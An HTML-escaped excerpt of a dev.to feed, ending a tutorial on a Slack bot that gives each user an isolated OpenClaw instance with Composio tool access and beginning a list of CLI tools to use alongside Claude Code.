    &lt;span class="na"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;slackUserId_slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;slackTeamId&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;existing&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;existing&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slackUser&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;composioEntityId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;`slack_&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;_&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Conversation history is stored per-thread using Slack's &lt;code&gt;thread_ts&lt;/code&gt; (the timestamp of the first message in a thread) as the thread id. When the bot receives a message, it fetches the full thread history and passes it to OpenClaw, giving it the memory for the duration of that thread.&lt;/p&gt;
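&lt;p&gt;A minimal sketch of that fetch-and-replay step, assuming a Slack WebClient-like object (the helper name and the &lt;code&gt;{ role, text }&lt;/code&gt; mapping are illustrative; &lt;code&gt;conversations.replies&lt;/code&gt; is the real Slack Web API method for reading a thread):&lt;/p&gt;

```typescript
// Hypothetical helper: fetch a Slack thread's messages so they can be
// passed to OpenClaw as context. `client` is assumed to be a Slack
// WebClient-like object; conversations.replies is the real Slack Web API
// method for reading a thread. The { role, text } mapping is a
// simplification for illustration.
async function getThreadHistory(client: any, channel: string, threadTs: string) {
  const res = await client.conversations.replies({ channel, ts: threadTs });
  const messages = res.messages || [];
  return messages.map(function (m: any) {
    return {
      // Messages posted by a bot carry a bot_id; treat those as assistant turns.
      role: m.bot_id ? "assistant" : "user",
      text: m.text || "",
    };
  });
}
```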


&lt;h2&gt;
  
  
  Configuration Setup
&lt;/h2&gt;

&lt;p&gt;The bot requires per-user OpenClaw instances assigned by an admin. If a user hasn't been assigned an instance, they can't use any features. &lt;code&gt;/connect&lt;/code&gt;, &lt;code&gt;/connections&lt;/code&gt; and chat all require an assignment first.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why not use a shared instance?
&lt;/h3&gt;

&lt;p&gt;By shared instance, I mean all users sharing the same OpenClaw instance. So why not use it that way? Isn't that how a server is supposed to work?&lt;/p&gt;

&lt;p&gt;There are a few reasons:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;By default, OpenClaw is not designed to support multiple users connecting to the same gateway concurrently, which is exactly what would happen in our use case.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;This alone is reason enough.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Also, in general, letting multiple users use the same instance with multiple connected accounts is not safe. A prompt injection by one user &lt;strong&gt;could&lt;/strong&gt; access or destroy another user's data.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Even if there are safety measures (which I'm not aware of), things could always go wrong. Better safe than sorry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 lib/config.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getUserOpenClawConfig&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;OpenClawConfig&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slackUser&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;findUnique&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;slackUserId_slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;slackTeamId&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;select&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;openclawGatewayUrl&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;openclawGatewayUrl&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;gatewayUrl&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;openclawGatewayUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="k"&gt;throw&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;No OpenClaw instance assigned. Ask your admin to run /assign.&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;No assignment, no access. The admin runs &lt;code&gt;/assign&lt;/code&gt; for each user, providing their OpenClaw gateway URL, token, and MCP Config. Until that happens, the bot won't respond to that user.&lt;/p&gt;
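&lt;p&gt;In the message handler, that gate can be a simple try/catch around the lookup. This is a sketch: &lt;code&gt;getUserOpenClawConfig&lt;/code&gt; is assumed to behave like the function above (resolve to a config, or throw when nothing is assigned), and &lt;code&gt;sendReply&lt;/code&gt; stands in for whatever reply mechanism the bot uses:&lt;/p&gt;

```typescript
// Sketch of the assignment gate in the message handler.
// getUserOpenClawConfig is assumed to behave like the function above:
// it resolves to a config or throws when no instance is assigned.
// sendReply stands in for whatever Slack reply mechanism the bot uses.
async function handleMessage(
  getUserOpenClawConfig: any,
  sendReply: any,
  slackUserId: string,
  slackTeamId: string,
  text: string,
) {
  let config;
  try {
    config = await getUserOpenClawConfig(slackUserId, slackTeamId);
  } catch (err: any) {
    // No assignment, no access: surface the error message to the user.
    await sendReply(err.message);
    return;
  }
  // ...forward `text` to the user's OpenClaw gateway using `config`...
  return config;
}
```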


&lt;h2&gt;
  
  
  Configure OpenClaw with Composio
&lt;/h2&gt;

&lt;p&gt;Great, now the code part is done. There's one thing still left.&lt;/p&gt;

&lt;p&gt;The actual reason we built the bot, tool access, still has to be configured &lt;strong&gt;within OpenClaw&lt;/strong&gt;, which we do with Composio. It's the easiest part.&lt;/p&gt;

&lt;p&gt;There are multiple ways to configure OpenClaw with Composio. You can find the standard approaches &lt;a href="https://composio.dev/claw" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;But we won't follow the standard way, which uses a consumer key by default. Instead, we'll work directly with the MCP URL.&lt;/p&gt;

&lt;p&gt;Go ahead and modify the OpenClaw config file, which lives at &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt;, with the following:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;rest&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;config...&lt;/span&gt;&lt;span class="w"&gt;

  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"allow"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"...rest"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"telegram"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;put&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;MCP&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;URL&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;you&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;receive&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;after&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;running&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/assign&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;for&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;user.&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"mcpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"..."&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;p&gt;This sets up &lt;strong&gt;one instance for one user&lt;/strong&gt;. But how do you go about configuring multiple instances for multiple users?&lt;/p&gt;
&lt;h3&gt;
  
  
  How do you run it for multiple users?
&lt;/h3&gt;

&lt;p&gt;This only configures one user in the entire workspace. But what about the rest?&lt;/p&gt;

&lt;p&gt;There are a few ways:&lt;/p&gt;
&lt;h4&gt;
  
  
  1. Separate machine or VMs:
&lt;/h4&gt;

&lt;p&gt;Each user's OpenClaw runs on a different machine, each with its own &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt; and its own MCP URL. This is the cleanest option, but also the most expensive.&lt;/p&gt;
&lt;h4&gt;
  
  
  2. Use named OpenClaw profiles:
&lt;/h4&gt;

&lt;p&gt;OpenClaw ships with a &lt;code&gt;--profile&lt;/code&gt; flag out of the box:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;  &lt;span class="nt"&gt;--profile&lt;/span&gt; &amp;lt;name&amp;gt;     Use a named profile &lt;span class="o"&gt;(&lt;/span&gt;isolates OPENCLAW_STATE_DIR/OPENCLAW_CONFIG_PATH under ~/.openclaw-&amp;lt;name&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You can use a different profile per user. If you name each profile after the user, you get an isolated config for each one on the same machine. This is the most efficient approach.&lt;/p&gt;

&lt;p&gt;For example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw &lt;span class="nt"&gt;--profile&lt;/span&gt; bob
openclaw &lt;span class="nt"&gt;--profile&lt;/span&gt; shrijal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  3. Separate OS users on one machine:
&lt;/h4&gt;

&lt;p&gt;Somewhat impractical. You'd run one OpenClaw instance per OS user, which means creating a separate system account for each person. Possible, but not a great approach.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;There could be hundreds of other ways to do it. These are just the ones I could think of. Do your own research, and you’ll probably find others.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  Slack Workflow
&lt;/h2&gt;

&lt;p&gt;Run these commands in order as an admin before any user can start chatting.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Register your MCP Configs (one per config you created on platform.composio.dev):
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/add-mcp-config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol start="2"&gt;
&lt;li&gt;Register auth configs (one per toolkit):
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/add-auth-config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol start="3"&gt;
&lt;li&gt;Assign each user their OpenClaw instance and MCP Config:
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/assign
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This gives you the user's scoped MCP URL. Configure it in their OpenClaw instance.&lt;/p&gt;

&lt;p&gt;Once assigned, users run:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/connect &amp;lt;toolkit&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That's it. After connecting, they can DM the bot or &lt;code&gt;@mention&lt;/code&gt; it in a channel.&lt;/p&gt;


&lt;h2&gt;
  
  
  Bot in Action
&lt;/h2&gt;

&lt;p&gt;Here's a quick demo of the bot in action:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/CbXwWr4h5LM"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So yeah, that's the whole idea.&lt;/p&gt;

&lt;p&gt;A Slack bot on top of OpenClaw, with Composio handling user tool connections, ends up being a really solid setup.&lt;/p&gt;

&lt;p&gt;At this point, you’ve got a good idea of how this bot works with Slack, OpenClaw, and Composio.&lt;/p&gt;

&lt;p&gt;We covered the main flow, how users connect their tools, how everything comes together inside Slack, and why assigning one OpenClaw instance per user helps keep things isolated.&lt;/p&gt;

&lt;p&gt;It keeps the setup clean and gives you a bot that’s actually useful.&lt;/p&gt;

&lt;p&gt;That's all for this one.&lt;/p&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://github.com/shricodev/saas-openclaw-slackbot" rel="noopener noreferrer"&gt;shricodev/saas-openclaw-slackbot&lt;/a&gt;&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>productivity</category>
      <category>programming</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Top 10 CLI Tools to Level-Up Claude Code</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Mon, 06 Apr 2026 12:51:40 +0000</pubDate>
      <link>https://dev.to/composiodev/top-10-cli-tools-to-level-up-claude-code-1kf9</link>
      <guid>https://dev.to/composiodev/top-10-cli-tools-to-level-up-claude-code-1kf9</guid>
      <description>&lt;p&gt;I've been using Claude Code more than any other AI agent recently.&lt;/p&gt;

&lt;p&gt;And when it's the tool you use the most, it just makes sense to make that workflow as productive as possible.&lt;/p&gt;

&lt;p&gt;A lot of the experience comes down to the small tools around it. The ones that help you search, navigate, review diffs, watch system usage, or just keep your workflow clean.&lt;/p&gt;

&lt;p&gt;So this post is a simple list of the CLI tools I think pair really nicely with Claude Code.&lt;/p&gt;

&lt;p&gt;There's an awesome repo with a curated collection of CLI tools for coding agents: &lt;a href="https://github.com/ComposioHQ/awesome-agent-clis" rel="noopener noreferrer"&gt;awesome-agent-clis&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqdpesfbdf4xrlpgg33w.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqdpesfbdf4xrlpgg33w.gif" alt="swag gif" width="500" height="284"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  What does "tools for Claude Code" actually mean?
&lt;/h2&gt;

&lt;p&gt;Claude Code is already powerful on its own.&lt;/p&gt;

&lt;p&gt;But it gets even better when you pair it with the right terminal tools, especially since you’re already working in the terminal.&lt;/p&gt;

&lt;p&gt;I’m &lt;strong&gt;not talking&lt;/strong&gt; about tools built specifically for Claude Code.&lt;/p&gt;

&lt;p&gt;I mean the CLI tools that make the overall workflow smoother, faster, and easier to manage while Claude is working in your repo.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://cli.github.com/" rel="noopener noreferrer"&gt;GitHub CLI&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ GitHub’s official CLI for working from the terminal.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe2e1eahx78q1aaboalu6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe2e1eahx78q1aaboalu6.png" alt="GitHub cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;GitHub CLI is basically running GitHub from your terminal. You can create repos, check issues, review PRs, manage branches, and handle a bunch of GitHub workflow stuff without leaving your shell.&lt;/p&gt;

&lt;p&gt;It can be as simple as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh repo create
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;for creating a new repository through an interactive prompt, which is the command I use the most. And there are tons of other commands you can use.&lt;/p&gt;

&lt;p&gt;Find all the others in the help window.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh &lt;span class="nt"&gt;--help&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;This one probably will not be for everyone.&lt;/p&gt;

&lt;p&gt;A lot of people do not want to give Claude access to their GitHub repos, and that is totally fair. But if you are comfortable with it, I honestly think it is one of the best tools to pair with Claude Code.&lt;/p&gt;

&lt;p&gt;Or even if you do not want Claude directly using it, GitHub CLI is still great to have beside Claude Code since you can just run the commands yourself and keep moving without leaving the terminal.&lt;/p&gt;


&lt;h2&gt;
  
  
  2. &lt;a href="https://composio.dev" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ An MCP server that connects Claude Code to hundreds of external apps.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvlarqn9v88xzclo19eid.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvlarqn9v88xzclo19eid.png" alt="composio cover" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;Composio is an MCP server you can add to Claude Code so it can work with 500+ apps.&lt;/p&gt;

&lt;p&gt;You can find the guide on how to connect Composio with Claude Code here: &lt;a href="https://composio.dev/toolkits/composio/framework/claude-code" rel="noopener noreferrer"&gt;Composio Universal CLI&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Why use it with Claude Code?
&lt;/h3&gt;

&lt;p&gt;The main way I use Composio with Claude Code is for email.&lt;/p&gt;

&lt;p&gt;Say I am working on something and need to send a mail to someone.&lt;/p&gt;

&lt;p&gt;Without this, I would usually have to stop, open my mail client, write the message, double check it, and send it myself.&lt;/p&gt;

&lt;p&gt;With Composio set up inside Claude Code, I can just ask Claude to draft the email, or give it the content and the recipient, and it can handle the rest for me.&lt;/p&gt;

&lt;p&gt;And maybe most importantly, no more spelling mistakes in your emails. 😃&lt;/p&gt;

&lt;p&gt;That is the workflow I use the most.&lt;/p&gt;

&lt;p&gt;Since you have access to 500+ apps, you can already imagine how many other things you could automate from there.&lt;/p&gt;

&lt;p&gt;They recently added CLI support as well, which you can install here: &lt;a href="https://composio.dev/cli" rel="noopener noreferrer"&gt;Composio CLI&lt;/a&gt;&lt;/p&gt;

